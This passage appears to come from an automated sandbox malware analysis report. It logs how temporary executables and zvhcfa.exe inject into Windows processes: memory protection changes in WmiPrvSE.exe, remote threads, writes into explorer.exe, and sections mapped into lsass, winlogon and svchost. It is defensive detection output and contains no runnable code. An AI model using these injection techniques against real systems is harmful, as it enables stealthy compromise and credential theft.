Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE30442 mov eax, dword ptr fs:[00000030h]	21_2_7FE30442
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Code function: 30_2_0042887F mov edx, dword ptr fs:[00000030h]	30_2_0042887F
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Code function: 30_2_004369D9 mov edx, dword ptr fs:[00000030h]	30_2_004369D9
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Code function: 30_2_0041A736 mov edx, dword ptr fs:[00000030h]	30_2_0041A736
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A00601 mov eax, dword ptr fs:[00000030h]	34_2_00A00601
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A00442 mov eax, dword ptr fs:[00000030h]	34_2_00A00442
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE40442 mov eax, dword ptr fs:[00000030h]	34_2_7FE40442
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE40601 mov eax, dword ptr fs:[00000030h]	34_2_7FE40601

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Changes memory attributes in foreign processes to executable or writable

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542FE0 protect: page execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542DC0 protect: page execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543620 protect: page execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542F60 protect: page execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77543710 protect: page execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77542C00 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Thread created: unknown EIP: 7FBD3C38	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Thread created: unknown EIP: 7FBC2FC3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Thread created: unknown EIP: 7FBB3C38	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Thread created: unknown EIP: 7FBA2FC3

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: PID: 3504 base: 77542FE0 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: PID: 3504 base: 77542DC0 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: PID: 3504 base: 77543620 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: PID: 3504 base: 77542F60 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: PID: 3504 base: 77543710 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Memory written: PID: 3504 base: 77542C00 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: PID: 3504 base: 77542FE0 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: PID: 3504 base: 77542DC0 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: PID: 3504 base: 77543620 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: PID: 3504 base: 77542F60 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: PID: 3504 base: 77543710 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Memory written: PID: 3504 base: 77542C00 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: PID: 3504 base: 77542FE0 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: PID: 3504 base: 77542DC0 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: PID: 3504 base: 77543620 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: PID: 3504 base: 77542F60 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: PID: 3504 base: 77543710 value: E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Memory written: PID: 3504 base: 77542C00 value: E8	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: PID: 3504 base: 77542FE0 value: E8
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: PID: 3504 base: 77542DC0 value: E8
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: PID: 3504 base: 77543620 value: E8
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: PID: 3504 base: 77542F60 value: E8
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: PID: 3504 base: 77543710 value: E8
Source: C:\Windows\SysWOW64\zvhcfa.exe	Memory written: PID: 3504 base: 77542C00 value: E8

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\lsass.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\dwm.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
